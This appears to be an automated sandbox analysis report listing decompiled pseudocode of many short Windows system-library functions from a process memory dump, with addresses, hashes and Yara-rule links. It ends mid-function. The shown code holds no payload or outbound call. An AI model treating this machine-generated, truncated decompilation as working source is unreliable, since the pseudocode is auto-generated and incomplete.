                                                                  			E049F14FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x4a2d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0497FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E04957D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0497B640(E04979AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                                  0x049f14fb
                                                                  0x049f14fb
                                                                  0x049f150a
                                                                  0x049f1514
                                                                  0x049f1519
                                                                  0x049f151b
                                                                  0x049f1526
                                                                  0x049f152c
                                                                  0x049f1534
                                                                  0x049f1537
                                                                  0x049f153a
                                                                  0x049f1545
                                                                  0x049f1557
                                                                  0x049f1547
                                                                  0x049f1550
                                                                  0x049f1550
                                                                  0x049f1562
                                                                  0x049f1563
                                                                  0x049f1565
                                                                  0x049f156a
                                                                  0x049f157f

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 87fc40639ad968daa03ad7b1421400e90dfc34120807daa9ef95dd383cf4e9a7
                                                                  • Instruction ID: a166fcdae8a2359bf1b07e93af7e2fa19bba7bd387e262de0eaf098a7008d530
                                                                  • Opcode Fuzzy Hash: 87fc40639ad968daa03ad7b1421400e90dfc34120807daa9ef95dd383cf4e9a7
                                                                  • Instruction Fuzzy Hash: 00019271A01248EFDB14DFA8D842EAEB7B8EF84714F004066F904EB280D674EE00CB94
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 049F138A, Relevance: .0, Instructions: 48COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 61%
                                                                  			E049F138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x4a2d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0497FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E04957D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0497B640(E04979AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                                  0x049f138a
                                                                  0x049f138a
                                                                  0x049f1399
                                                                  0x049f13a3
                                                                  0x049f13a8
                                                                  0x049f13aa
                                                                  0x049f13b5
                                                                  0x049f13bb
                                                                  0x049f13c3
                                                                  0x049f13c6
                                                                  0x049f13c9
                                                                  0x049f13d4
                                                                  0x049f13e6
                                                                  0x049f13d6
                                                                  0x049f13df
                                                                  0x049f13df
                                                                  0x049f13f1
                                                                  0x049f13f2
                                                                  0x049f13f4
                                                                  0x049f13f9
                                                                  0x049f140e

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 66cc058fdb60736fc5cfb8a560b89a2724a2aa842de6ce7c5b686c44440f5100
                                                                  • Instruction ID: d154d87dfe6a9106edab64b8f6364ca47926254d9eff8853310185a2c814f534
                                                                  • Opcode Fuzzy Hash: 66cc058fdb60736fc5cfb8a560b89a2724a2aa842de6ce7c5b686c44440f5100
                                                                  • Instruction Fuzzy Hash: 33015271A01218AFDB14DFA9D842EAEB7B8EF84714F104066F904EB280E674AE05C795
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 049358EC, Relevance: .0, Instructions: 47COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 91%
                                                                  			E049358EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x4a2d360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x4915c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E04935943() != 0 &&  *0x4a25320 > 5) {
					E049B7B5E( &_v44, _t27);
					_t22 =  &_v28;
					E049B7B5E( &_v28, _t28);
					_t11 = E049B7B9C(0x4a25320, 0x491bf15,  &_v28, _t22, 4,  &_v76);
				}
				return E0497B640(_t11, _t17, _v8 ^ _t29, 0x491bf15, _t27, _t28);
			}















                                                                  0x049358fb
                                                                  0x049358fe
                                                                  0x04935906
                                                                  0x0493590a
                                                                  0x0493593c
                                                                  0x0493593c
                                                                  0x0493590c
                                                                  0x0493590c
                                                                  0x04935911
                                                                  0x00000000
                                                                  0x04935913
                                                                  0x04935913
                                                                  0x04935913
                                                                  0x04935911
                                                                  0x0493591d
                                                                  0x04991035
                                                                  0x0499103c
                                                                  0x0499103f
                                                                  0x04991056
                                                                  0x04991056
                                                                  0x0493593b

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 71c99570da6fb35c527e8d653af05bd1bce1678fdef9cdcc9d19b8794e3f2ec0
                                                                  • Instruction ID: e5d3e11c1d7673dca69dc97466880207643b49268095b61bef4285b5ddd0202f
                                                                  • Opcode Fuzzy Hash: 71c99570da6fb35c527e8d653af05bd1bce1678fdef9cdcc9d19b8794e3f2ec0
                                                                  • Instruction Fuzzy Hash: 9C018F31B00118BFE714EA69D9149BF77ADEBC9238BD601B99805A7244EE31FD02C690
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0494B02A, Relevance: .0, Instructions: 46COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E0494B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E04957D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E049B7016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







                                                                  0x0494b037
                                                                  0x0494b039
                                                                  0x0494b03b
                                                                  0x0494b040
                                                                  0x0499a60e
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0499a61d
                                                                  0x0494b04b
                                                                  0x0494b04e
                                                                  0x0499a627
                                                                  0x0499a634
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0499a641
                                                                  0x0499a653
                                                                  0x0499a643
                                                                  0x0499a64c
                                                                  0x0499a64c
                                                                  0x0499a65b
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0499a66c
                                                                  0x0494b057
                                                                  0x0494b057
                                                                  0x0494b057
                                                                  0x0494b046
                                                                  0x0494b046
                                                                  0x00000000

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                  • Instruction ID: 32f2444a09fa7cf8c009ee061880c58a233234430fc9ed0856eb9b26056ae69a
                                                                  • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                  • Instruction Fuzzy Hash: 65017C322009809FD726CB5DC988F7677DCEB85754F0904B1F919CBA65E628FC40C620
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04A01074, Relevance: .0, Instructions: 46COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E04A01074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E04A0165E(__ebx, 0x4a28ae4, (__edx -  *0x4a28b04 >> 0x14) + (__edx -  *0x4a28b04 >> 0x14), __edi, __ecx, (__edx -  *0x4a28b04 >> 0x14) + (__edx -  *0x4a28b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E049FAFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E04957D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E049EFE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}











                                                                  0x04a01074
                                                                  0x04a01080
                                                                  0x04a01082
                                                                  0x04a0108a
                                                                  0x04a0108f
                                                                  0x04a01093
                                                                  0x04a010ab
                                                                  0x04a010ab
                                                                  0x04a010c3
                                                                  0x04a010cf
                                                                  0x04a010e1
                                                                  0x04a010d1
                                                                  0x04a010da
                                                                  0x04a010da
                                                                  0x04a010e9
                                                                  0x04a010f5
                                                                  0x04a010f5
                                                                  0x04a010fe

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d336f31467722fe69c6bae00be054d688c8c3c03dfdc11a6073c09514b5c2aac
                                                                  • Instruction ID: c5fd7579374631eb0fe968d27a509d1c0bbbaa318a9d11d32237f81be4a38392
                                                                  • Opcode Fuzzy Hash: d336f31467722fe69c6bae00be054d688c8c3c03dfdc11a6073c09514b5c2aac
                                                                  • Instruction Fuzzy Hash: CE014772604741AFE711EF68E944B5A77E5ABC4318F04C62DF886836D0EE36F940CB92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 049EFEC0, Relevance: .0, Instructions: 46COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 59%
                                                                  			E049EFEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x4a2d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0497FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E04957D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0497B640(E04979AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                                  0x049efec0
                                                                  0x049efec0
                                                                  0x049efecf
                                                                  0x049efed9
                                                                  0x049efede
                                                                  0x049efee0
                                                                  0x049efeeb
                                                                  0x049efef3
                                                                  0x049efef6
                                                                  0x049efef9
                                                                  0x049eff04
                                                                  0x049eff16
                                                                  0x049eff06
                                                                  0x049eff0f
                                                                  0x049eff0f
                                                                  0x049eff21
                                                                  0x049eff22
                                                                  0x049eff24
                                                                  0x049eff29
                                                                  0x049eff3e

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a140a93277211fcba57914e9efc19899ceca83bff9ea7d3bfbeb37d2d7a67703
                                                                  • Instruction ID: a6d15566d7dd6b2c6fa68fab091454279e03356594e939bb14b68b22ab03891c
                                                                  • Opcode Fuzzy Hash: a140a93277211fcba57914e9efc19899ceca83bff9ea7d3bfbeb37d2d7a67703
                                                                  • Instruction Fuzzy Hash: 69018471E01208ABDB14DBA9D845FBFB7B8EF84714F004076F900AB291EA74EA01C794
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 049EFE3F, Relevance: .0, Instructions: 46COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 59%
                                                                  			E049EFE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x4a2d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0497FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E04957D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0497B640(E04979AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                                  0x049efe3f
                                                                  0x049efe3f
                                                                  0x049efe4e
                                                                  0x049efe58
                                                                  0x049efe5d
                                                                  0x049efe5f
                                                                  0x049efe6a
                                                                  0x049efe72
                                                                  0x049efe75
                                                                  0x049efe78
                                                                  0x049efe83
                                                                  0x049efe95
                                                                  0x049efe85
                                                                  0x049efe8e
                                                                  0x049efe8e
                                                                  0x049efea0
                                                                  0x049efea1
                                                                  0x049efea3
                                                                  0x049efea8
                                                                  0x049efebd

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4f54c64a966002097ba2b5e171f4640567b769486fd2da59b80d8a3faa13eea1
                                                                  • Instruction ID: 93855012960e37afbc05cc0827f4110d7e8a00fd823111828c2d6efb903efd0f
                                                                  • Opcode Fuzzy Hash: 4f54c64a966002097ba2b5e171f4640567b769486fd2da59b80d8a3faa13eea1
                                                                  • Instruction Fuzzy Hash: C2018471E01208ABDB14DFA9D845FBEB7B8EF84714F00407AF900AB291DA74AA01C794
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04A08ED6, Relevance: .0, Instructions: 44COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 54%
                                                                  			E04A08ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x4a2d360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E04957D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E0497B640(E04979AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}


















                                                                  0x04a08ed6
                                                                  0x04a08ee5
                                                                  0x04a08eed
                                                                  0x04a08ef0
                                                                  0x04a08efa
                                                                  0x04a08f03
                                                                  0x04a08f0c
                                                                  0x04a08f15
                                                                  0x04a08f24
                                                                  0x04a08f27
                                                                  0x04a08f31
                                                                  0x04a08f43
                                                                  0x04a08f33
                                                                  0x04a08f3c
                                                                  0x04a08f3c
                                                                  0x04a08f4e
                                                                  0x04a08f4f
                                                                  0x04a08f51
                                                                  0x04a08f56
                                                                  0x04a08f69

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 53ed1c4aab8def3f828dedcbdcf9472132f0763babcb17df6c54c145de57178c
                                                                  • Instruction ID: 38318880e284732daf324a8f995f5ed5602f6ef5c6a82bb61c85c4b6eff0b4f3
                                                                  • Opcode Fuzzy Hash: 53ed1c4aab8def3f828dedcbdcf9472132f0763babcb17df6c54c145de57178c
                                                                  • Instruction Fuzzy Hash: 05111270E002099FD704DFA8D541BAEB7F4FF08704F1482BAE518EB381E634A940CB94
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04A08A62, Relevance: .0, Instructions: 44COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 54%
                                                                  			E04A08A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x4a2d360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E04957D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0497B640(E04979AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                                  0x04a08a62
                                                                  0x04a08a71
                                                                  0x04a08a79
                                                                  0x04a08a82
                                                                  0x04a08a85
                                                                  0x04a08a89
                                                                  0x04a08a8c
                                                                  0x04a08a8f
                                                                  0x04a08a92
                                                                  0x04a08a95
                                                                  0x04a08a9f
                                                                  0x04a08ab1
                                                                  0x04a08aa1
                                                                  0x04a08aaa
                                                                  0x04a08aaa
                                                                  0x04a08abc
                                                                  0x04a08abd
                                                                  0x04a08abf
                                                                  0x04a08ac4
                                                                  0x04a08ada

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 74ddbf3a64082a9827c69e7a21c46c7ac4784567bbfdea1985f2684df975e9e8
                                                                  • Instruction ID: e0aff2a2d76add18c36ade7dcbcad508a6e2229e99a8251fd431be49a3fec508
                                                                  • Opcode Fuzzy Hash: 74ddbf3a64082a9827c69e7a21c46c7ac4784567bbfdea1985f2684df975e9e8
                                                                  • Instruction Fuzzy Hash: 70012171A0121C9FDB04DFA9D9419EEB7B8EF48714F50406AF904E7351D634AA01CBA4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0493DB60, Relevance: .0, Instructions: 43COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E0493DB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E0493DB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E0493E7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L0493E8B0(__ecx, _t14, 0xfff);
							L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}







                                                                  0x0493db64
                                                                  0x0493db66
                                                                  0x0493db6b
                                                                  0x0493dbaa
                                                                  0x0493db71
                                                                  0x0493db76
                                                                  0x0493db7a
                                                                  0x0493dba3
                                                                  0x0493db7c
                                                                  0x0493db87
                                                                  0x0493db8b
                                                                  0x04994fa1
                                                                  0x04994fb3
                                                                  0x04994fb8
                                                                  0x0493db91
                                                                  0x0493db96
                                                                  0x0493db98
                                                                  0x0493db98
                                                                  0x0493db8b
                                                                  0x0493db7a
                                                                  0x0493db9d
                                                                  0x0493dba2

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                  • Instruction ID: bef01d458272ad5b6eac4a63832fe96c4cc078c74da5fa1155e1b783ee40cda6
                                                                  • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                  • Instruction Fuzzy Hash: 40F04C332045239FE7335A554890F27B6BA9FC3A62F150575F1059B344C970AC0293E1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0493B1E1, Relevance: .0, Instructions: 42COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E0493B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E04957D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E04957D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E049B7016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






                                                                  0x0493b1e8
                                                                  0x0493b1ea
                                                                  0x0493b1f3
                                                                  0x04994a17
                                                                  0x0493b1f9
                                                                  0x0493b1f9
                                                                  0x0493b1f9
                                                                  0x0493b201
                                                                  0x04994a21
                                                                  0x04994a2e
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04994a3b
                                                                  0x04994a4d
                                                                  0x04994a3d
                                                                  0x04994a46
                                                                  0x04994a46
                                                                  0x04994a55
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0493b20a
                                                                  0x0493b20a
                                                                  0x0493b20a
                                                                  0x0493b20a

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                  • Instruction ID: b623ece635b2f75c337b51afc10a292fad3d061f8821c0f5609c86b93e8dbd54
                                                                  • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                  • Instruction Fuzzy Hash: 6F01D132205A809BD722979DC904F697BDDEF92754F0804B2F9148B6B2E678FC01C314
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 049CFE87, Relevance: .0, Instructions: 38COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 46%
                                                                  			E049CFE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x4a2d360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E04957D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
